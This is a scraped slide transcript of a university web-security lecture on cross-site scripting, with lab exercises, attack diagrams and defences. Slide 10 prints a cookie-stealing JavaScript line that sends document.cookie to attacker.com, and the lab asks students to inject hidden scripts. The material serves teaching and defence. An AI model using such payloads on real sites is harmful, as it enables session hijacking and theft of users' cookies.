Presentation is loading. Please wait.

Presentation is loading. Please wait.

SlideSet #20: Input Validation and Cross-site Scripting Attacks (XSS) SY306 Web and Databases for Cyber Operations.

Published byBridget Watkins Modified over 8 years ago

Similar presentations

Presentation on theme: "SlideSet #20: Input Validation and Cross-site Scripting Attacks (XSS) SY306 Web and Databases for Cyber Operations."— Presentation transcript:

1 SlideSet #20: Input Validation and Cross-site Scripting Attacks (XSS) SY306 Web and Databases for Cyber Operations

2 How does a user input information to your site? How does your server-side code process the input? How do you store the input? Does the input later appear on your site? Verbatim? Input to your Website

3 Lab Exercise Teams of 3 Visit this website, and post a message! –http://mope.academy.usna.edu/~le/hack/bufftalk.pyhttp://mope.academy.usna.edu/~le/hack/bufftalk.py

4 Lab Exercise Teams of 3 Visit this website, and post a message! –http://mope.academy.usna.edu/~le/hack-groupX/bufftalk.pyhttp://mope.academy.usna.edu/~le/hack-groupX/bufftalk.py –X is your group number: 1,2,3,4,5,6,7 –Ex. group 2 is: http://mope.academy.usna.edu/~le/hack- group2/bufftalk.pyEx. group 2 is: http://mope.academy.usna.edu/~le/hack- group2/bufftalk.py Now break it to mess up the display – no JavaScript.

5 Displaying User Content ** Dangerous, but necessary in all social media! Bare Minimum Security Options 1.Check all strings for HTML tags, reject them 2.Replace characters with > and < 3.(need a lot more if databases are involved)

6 Injection: HTML vs Javascript HTML injection can ruin a page’s display, but not much else Javascript injection can steal information –It can read your cookies –Redirect to other (fake) websites

7 Lab Exercise 1.Inject Javascript, but do not break the page. –Why would a malicious hacker not want to visibly break it? 2.Find out what cookies are stored for the page 3.Inject Javascript to display the user’s name to the screen (“I see you username”).

8 Cross-site Scripting (XSS) Trick client browser to execute malicious code (JS/HTML) Targets clients of Web applications, not application itself Parties involved: –Attacker –Server –Client (victim) – runs malicious code in browser

9 Cross-site scripting attacks 1.Victim uses a web site that sets cookies on victim’s browser 2.Victim clicks on a URL link or visits web site containing evil script 3.Victim’s browser transmits evil code to the target site as a HTTP request 4.Target site reflects the evil code back to the victim’s browser in response to the request 5.Evil script executes within victim’s browser under the security context of the target site

10 Reflective XSS E.g. URL link contains malicious script. Victim Attacker Application 1. Victim logs into facebook.php in and is issued cookie: Set-Cookie: sessionID=abc123 2. Victim clicks on URL: http://facebook.php?message= var a=new Image(); a.src=‘http://attacker.com/my.py?document.cookie; 3. Victim send HTTP GET request for http://facebook.php?message= var a=new Image(); a.src=‘http://attacker.com/my.py?document.cookie; 4 & 5. Victim executes the javascript 6. Attacker hicjacks victim’s facebook session using their sessionID

11 Stored XSS Malicious post on public forum contains malicious script which will execute on victim’s browser Victim Attacker Application 1. Victim logs into facebook.php in and is issued cookie: Set-Cookie: sessionID=abc123 2. Attacker posts “ document.writeln(‘ “ to Victims FB wall 3. Victim see’s FB wall and sends HTTP GET request to 4 & 5. Victim executes the javascript 6. Attacker hijacks victim’s facebook session using their sessionID

12 Causes of XSS Failed input validation User input is displayed back in the same form Attacker injects malicious code into non-malicious site –Client gets the code from the website, cannot distinguish between legit and malicious content

13 Let’s just block !! Easy enough: check all input strings for and reject them Is that good enough?

14 XSS Defense Input filtering Set encoding of HTML pages Output encoding More at: https://www.owasp.org/index.php/XSS_%28Cross_Site_Scripting%29_Pre vention_Cheat_Sheet https://www.owasp.org/index.php/XSS_%28Cross_Site_Scripting%29_Pre vention_Cheat_Sheet

Download ppt "SlideSet #20: Input Validation and Cross-site Scripting Attacks (XSS) SY306 Web and Databases for Cyber Operations."

Similar presentations

Cross-Site Scripting Issues and Defenses Ed Skoudis Predictive Systems © 2002, Predictive Systems.

Cross-Site Scripting Issues and Defenses Ed Skoudis Predictive Systems © 2002, Predictive Systems.
Nick Feamster CS 6262 Spring 2009

Nick Feamster CS 6262 Spring 2009
Past, Present and Future By Eoin Keary and Jim Manico

Past, Present and Future By Eoin Keary and Jim Manico
Web Security Never, ever, trust user inputs Supankar.

Web Security Never, ever, trust user inputs Supankar.
What is code injection? Code injection is the exploitation of a computer bug that is caused by processing invalid data. Code injection can be used by.

What is code injection? Code injection is the exploitation of a computer bug that is caused by processing invalid data. Code injection can be used by.
HI-TEC 2011 SQL Injection. Client’s Browser HTTP or HTTPS Web Server Apache or IIS HTML Forms CGI Scripts Database SQL Server or Oracle or MySQL ODBC.

HI-TEC 2011 SQL Injection. Client’s Browser HTTP or HTTPS Web Server Apache or IIS HTML Forms CGI Scripts Database SQL Server or Oracle or MySQL ODBC.
Hands-on SQL Injection Attack and Defense HI-TEC July 21, 2013.

Hands-on SQL Injection Attack and Defense HI-TEC July 21, 2013.
Lecture 6/2/12. Forms and PHP The PHP $_GET and $_POST variables are used to retrieve information from forms, like user input When dealing with HTML forms.

Lecture 6/2/12. Forms and PHP The PHP $_GET and $_POST variables are used to retrieve information from forms, like user input When dealing with HTML forms.
Protecting Browsers from Cross-Origin CSS Attacks Lin-Shung Huang, Zack Weinberg Carnegie Mellon University Chris Evans Google Collin Jackson Carnegie.

Protecting Browsers from Cross-Origin CSS Attacks Lin-Shung Huang, Zack Weinberg Carnegie Mellon University Chris Evans Google Collin Jackson Carnegie.
©2009 Justin C. Klein Keane PHP Code Auditing Session 5 XSS & XSRF Justin C. Klein Keane

©2009 Justin C. Klein Keane PHP Code Auditing Session 5 XSS & XSRF Justin C. Klein Keane
Cross Site Scripting & SQL injection

Cross Site Scripting & SQL injection
17 th ACM CCS (October, 2010).  Introduction  Threat Model  Cross-Origin CSS Attacks  Example Attacks  Defenses  Experiment  Related Work 2 A Presentation.

17 th ACM CCS (October, 2010).  Introduction  Threat Model  Cross-Origin CSS Attacks  Example Attacks  Defenses  Experiment  Related Work 2 A Presentation.
EECS 354 Network Security Cross Site Scripting (XSS)

EECS 354 Network Security Cross Site Scripting (XSS)
Cross Site Scripting a.k.a. XSS Szymon Siewior. Disclaimer Everything that will be shown, was created for strictly educational purposes. You may reuse.

Cross Site Scripting a.k.a. XSS Szymon Siewior. Disclaimer Everything that will be shown, was created for strictly educational purposes. You may reuse.
COMP 321 Week 12. Overview Web Application Security  Authentication  Authorization  Confidentiality Cross-Site Scripting Lab 12-1 Introduction.

COMP 321 Week 12. Overview Web Application Security  Authentication  Authorization  Confidentiality Cross-Site Scripting Lab 12-1 Introduction.
CMSC 414 Computer and Network Security Lecture 24 Jonathan Katz.

CMSC 414 Computer and Network Security Lecture 24 Jonathan Katz.
9/9/2005 Developing Secure Web Applications 1 Methods & Concepts for Developing “Secure” Web Applications Peter Y. Hammond, Developer Wasatch Front Regional.

9/9/2005 Developing "Secure" Web Applications 1 Methods & Concepts for Developing “Secure” Web Applications Peter Y. Hammond, Developer Wasatch Front Regional.
Chapter 9 Web Applications. Web Applications are public and available to the entire world. Easy access to the application means also easy access for malicious.

Chapter 9 Web Applications. Web Applications are public and available to the entire world. Easy access to the application means also easy access for malicious.
Introduction to the OWASP Top 10. Cross Site Scripting (XSS)  Comes in several flavors:  Stored  Reflective  DOM-Based.

Introduction to the OWASP Top 10. Cross Site Scripting (XSS)  Comes in several flavors:  Stored  Reflective  DOM-Based.
CGI Programming: Part 1. What is CGI? CGI = Common Gateway Interface Provides a standardized way for web browsers to: –Call programs on a server. –Pass.

CGI Programming: Part 1. What is CGI? CGI = Common Gateway Interface Provides a standardized way for web browsers to: –Call programs on a server. –Pass.

Similar presentations

Ads by Google